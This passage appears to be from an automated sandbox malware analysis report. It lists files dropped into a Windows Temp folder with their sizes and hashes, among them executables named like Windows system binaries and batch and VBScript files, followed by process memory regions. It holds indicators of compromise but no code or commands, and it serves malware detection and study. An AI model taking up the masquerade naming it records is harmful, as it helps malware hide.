        98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

      • C:\Users\Admin\AppData\Local\Temp\Cab2906.tmp

        Filesize

        67KB

        MD5

        2d3dcf90f6c99f47e7593ea250c9e749

        SHA1

        51be82be4a272669983313565b4940d4b1385237

        SHA256

        8714e7be9f9b6de26673d9d09bd4c9f41b1b27ae10b1d56a7ad83abd7430ebd4

        SHA512

        9c11dd7d448ffebe2167acde37be77d42175edacf5aaf6fb31d3bdfe6bb1f63f5fdbc9a0a2125ed9d5ce0529b6b548818c8021532e1ea6b324717cc9bec0aaa5

      • C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe

        Filesize

        4.4MB

        MD5

        3405f654559010ca2ae38d786389f0f1

        SHA1

        8ac5552c64dfc3ccf0c678f6f946ee23719cf43d

        SHA256

        bc1364d8e68f515f9f35a6b41c11a649b1f514302eb01812c68c9a95a3198b30

        SHA512

        cb1e5ffed2ab86502ea4236383e9a4211a14b1abda13babbcceea67700c5746b37b4da6e45e10196eb76fa1e6959e71f19c6827466a54df1d5ba5ad2e16fc05b

      • C:\Users\Admin\AppData\Local\Temp\bfsvc.cfg

        Filesize

        420B

        MD5

        51c9e864182413f35b76d42d435df261

        SHA1

        dc5ec227ab38093927a119b4d646c3811c3553cd

        SHA256

        e6c5c674268a865db840afd3764cd498bdfd8fe677c5193d662abbe64d68975b

        SHA512

        b36e683b6487bfbf4e512214343128e57a52eb71356345caba70a98dc5b0bad764da842d08443d3b47bd3dddbe24af146c561ae480038c95f124a51565e3fd99

      • C:\Users\Admin\AppData\Local\Temp\compile.bat

        Filesize

        156B

        MD5

        eb51755b637423154d1341c6ee505f50

        SHA1

        d71d27e283b26e75e58c0d02f91d91a2e914c959

        SHA256

        db903aae119dc795581080a528ba04286be11be7e9d417305d77123545fbf0f9

        SHA512

        e23463fe0a3719c2700826b55f375f60e5e67f3e432aa8e90c5afc8f449fc635aa4c031f9b6fa71344a8da9542585b74e4c812383043868a10a1065d477acee5

      • C:\Users\Admin\AppData\Local\Temp\compile.bat

        Filesize

        71B

        MD5

        91128da441ad667b8c54ebeadeca7525

        SHA1

        24b5c77fb68db64cba27c338e4373a455111a8cc

        SHA256

        50801c4db374acec11831bf7602cd2635bc8964800c67217b25683dce4a45873

        SHA512

        bd2a8bc4458b1bc85c5a59db872278197bb0a2a2086a1a9aa5b6b876965b9f5586959171f334237588cc6b0f9643f580db2e959f82e451f4a3043a27e4a95cdd

      • C:\Users\Admin\AppData\Local\Temp\compile.bat

        Filesize

        70B

        MD5

        d90accebb3f79fe65cd938425c07b0ae

        SHA1

        9df3812a88d87dd419cd9e89afa5fb1d71be0dc9

        SHA256

        aca74cefaef4b7a32338c9c63187cffa1e808b54ab218a064007683ad1bd3a0e

        SHA512

        44013bfda1dbe5b217d4872e8d550cd00471cb8b969ffd6b07f83b0c59ac20ec2512d275a4603cc00e5de3a04666f66e897601ba51a5e02af622e5139ac04560

      • C:\Users\Admin\AppData\Local\Temp\compile.bat

        Filesize

        74B

        MD5

        808099bfbd62ec04f0ed44959bbc6160

        SHA1

        f4b6853d958c2c4416f6e4a5be8a11d86f64c023

        SHA256

        f465a1bd2f9a3efcf0589f0b1c234d285f2bebf7416b324271d987a282915ca8

        SHA512

        e4f75253a402f0f5d5c651cde045757dad0d4312be023fabf279d7c053fde6ba63cf387551a0451585a87f929634e0bfa73a06dac85ecd1bb5bc0b72bb98e1f0

      • C:\Users\Admin\AppData\Local\Temp\compile.vbs

        Filesize

        265B

        MD5

        ca906422a558f4bc9e471709f62ec1a9

        SHA1

        e3da070007fdeae52779964df6f71fcb697ffb06

        SHA256

        abf09cb96f4c04a1d2d2bfd7184da63dd79c2109b1a768ca5dae4265def39eee

        SHA512

        661d4b4130ba12281527db418f71b7213dab62931806e2bd48690cfaed65b8a2859e5b161eaa4152d5a18babb54d6c2203f4ef5e3a1153c468d67703fd79f66b

      • C:\Users\Admin\AppData\Local\Temp\config

        Filesize

        107B

        MD5

        5cf0b95f68c3304427f858db1cdde895

        SHA1

        a0c5c3872307e9497f8868b9b8b956b9736a9cdf

        SHA256

        353de1200b65a2e89e84b32067a908103cca22ad2e51ba62c171eef3c25b73aa

        SHA512

        5c11c4ebcd4663d02ee3ffc19b7ec83b953dca7a7a1d2b63edaab72425a61e926ac940d99f2faa6b1baba0d28068e8f3ae64105990e0a0626ba02d8f979b455b

      • C:\Users\Admin\AppData\Local\Temp\hh.exe

        Filesize

        103KB

        MD5

        4d4c98eca32b14aeb074db34cd0881e4

        SHA1

        92f213d609bba05d41d6941652a88c44936663a4

        SHA256

        4182172a01bdfc08c5cf7e8652f7d9d81858345a770e2b6b507840e4c1c7764f

        SHA512

        959da8bbf6084e802ed366de8d240382b8a5ab2f18bc58881f42ecb7a8ed082d0e078b3ad18dbf90ac0a14cd491b5ac8b00cf1f0a266bdb7ebb8d95c5c71cacf

      • C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe

        Filesize

        391KB

        MD5

        053778713819beab3df309df472787cd

        SHA1

        99c7b5827df89b4fafc2b565abed97c58a3c65b8

        SHA256

        f999357a17e672e87fbed66d14ba2bebd6fb04e058a1aae0f0fdc49a797f58fe

        SHA512

        35a00001c718e36e956f49879e453f18f5d6c66bbc6a3e1aad6d5dd1109904539b173c3cad0009bc021d4513a67ae0003282f7d14b7aecaa20e59a22c6ad0ddb

      • C:\Users\Admin\AppData\Local\Temp\splwow64.exe

        Filesize

        49KB

        MD5

        0d8360781e488e250587a17fbefa646c

        SHA1

        29bc9b438efd70defa8fc45a6f8ee524143f6d04

        SHA256

        ebff7d07efda7245192ce6ecd7767578152b515b510c887ca2880a2566071f64

        SHA512

        940a98f282473c6f706783b41b72eccce88620e12db1f91be6425f087284746e6e10d4d9420b5e79e87ec3a2fd595b9fe301576e39a4db6bd3daa4aa93a9042e

      • C:\Users\Admin\AppData\Local\Temp\whysosad

        Filesize

        3KB

        MD5

        fc3c88c2080884d6c995d48e172fbc4f

        SHA1

        cb1dcc479ad2533f390786b0480f66296b847ad3

        SHA256

        1637ce704a463bd3c91a38aa02d1030107670f91ee3f0dd4fa13d07a77ba2664

        SHA512

        4807d3bd44a3197d1a9dcf709a1e70e1cf3bf71fe1a9fa1479441b598154c282a620208557a4415a34d23ceb4fd32dda41edbb940b46acb2f00c696648703bf1

      • C:\Users\Admin\AppData\Local\Temp\winhlp32.exe

        Filesize

        184KB

        MD5

        a776e68f497c996788b406a3dc5089eb

        SHA1

        45bf5e512752389fe71f20b64aa344f6ca0cad50

        SHA256

        071e26ddf5323dd9ed6671bcde89df73d78bac2336070e6cb9e3e4b93bde78d1

        SHA512

        02b1234ad37b768b9bcba74daf16e6b45b777f340dac0b64a85166fdd793955e3d7f88a95142b603b198e504ef1173618f840511bcdb70448f71aed19c009073

      • C:\Users\Admin\AppData\Local\Temp\xwizard.cfg

        Filesize

        1KB

        MD5

        ae8eed5a6b1470aec0e7fece8b0669ef

        SHA1

        ca0e896f90c38f3a8bc679ea14c808726d8ef730

        SHA256

        3f6ca2bc068c8436044daab867f8ff8f75060048b29882cb2ac9fdef1800df9e

        SHA512

        e79d04f4041edb867fd6bdf4485f78352292782d9405ba81888a1bc62f5039cc46c6cc786ba1fd53284baafa7128e0f875390cb573584ed2d03c3b33c7f93eb6

      • \Users\Admin\AppData\Local\Temp\bfsvc.exe

        Filesize

        71KB

        MD5

        899d3ed011eb58459b8a4fc2b81f0924

        SHA1

        80361f1e0b93143ec1ddfee156760f5938c85791

        SHA256

        5e3f311ae67f046b56435067bcdd39fbf836fa0421fbc8c8b0e43e8e47524954

        SHA512

        802ee4f8d25417589c7e62f0acc9dc2dc8f1d32654ca435f6aeae2926e6900373648790451c9143856a772a49c2a8f3c8659c5b8260f0f67559aeef875825f05

      • \Users\Admin\AppData\Local\Temp\xwizard.exe

        Filesize

        544KB

        MD5

        df991217f1cfadd9acfa56f878da5ee7

        SHA1

        0b03b34cfb2985a840db279778ca828e69813116

        SHA256

        deb1246347ce88e8cdd63a233a64bc2090b839f2d933a3097a2fd8fd913c4112

        SHA512

        175cde9e0def550f6380b4a9feb6845dfddbb641e2455d9d25dc6bfc7ffc08e654ea731946588961a5825dcc45c8b31972454a330fd97d7170f1991a8dac0316

      • memory/1772-132-0x0000000000400000-0x000000000041B000-memory.dmp

        Filesize

        108KB

      • memory/1936-128-0x0000000000400000-0x000000000045B000-memory.dmp

        Filesize

        364KB

      • memory/2416-115-0x0000000000170000-0x00000000001CB000-memory.dmp

        Filesize

        364KB

      • memory/2480-13-0x00000000748E0000-0x0000000074FCE000-memory.dmp

        Filesize

        6.9MB

      • memory/2480-42-0x0000000000650000-0x000000000065C000-memory.dmp

        Filesize

        48KB

      • memory/2480-46-0x00000000008C0000-0x00000000008CA000-memory.dmp

        Filesize

        40KB

      • memory/2480-45-0x0000000000D20000-0x0000000000D5C000-memory.dmp

        Filesize

        240KB

      • memory/2480-44-0x0000000000CF0000-0x0000000000D20000-memory.dmp

        Filesize

        192KB

      • memory/2480-43-0x00000000008A0000-0x00000000008BA000-memory.dmp

        Filesize

        104KB

      • memory/2480-48-0x0000000000320000-0x0000000000328000-memory.dmp

        Filesize

        32KB

      • memory/2480-10-0x00000000748EE000-0x00000000748EF000-memory.dmp

        Filesize

        4KB

      • memory/2480-80-0x0000000005200000-0x0000000005208000-memory.dmp

        Filesize

        32KB

      • memory/2480-47-0x0000000004770000-0x0000000004812000-memory.dmp

        Filesize

        648KB

      • memory/2480-131-0x00000000748EE000-0x00000000748EF000-memory.dmp

        Filesize

        4KB

      • memory/2480-136-0x00000000748E0000-0x0000000074FCE000-memory.dmp

        Filesize

        6.9MB

      • memory/2480-79-0x0000000004ED0000-0x0000000004ED8000-memory.dmp

        Filesize

        32KB

      • memory/2480-181-0x00000000748E0000-0x0000000074FCE000-memory.dmp

        Filesize

        6.9MB

      • memory/2480-12-0x00000000046C0000-0x0000000004770000-memory.dmp

        Filesize

        704KB

      • memory/2480-11-0x0000000000E40000-0x00000000012BA000-memory.dmp

        Filesize

        4.5MB

      • memory/2644-0-0x000007FEF5D03000-0x000007FEF5D04000-memory.dmp

        Filesize

        4KB

      • memory/2644-1-0x0000000000170000-0x00000000005EE000-memory.dmp

        Filesize

        4.5MB

      • memory/2644-124-0x000007FEF5D03000-0x000007FEF5D04000-memory.dmp

        Filesize

        4KB
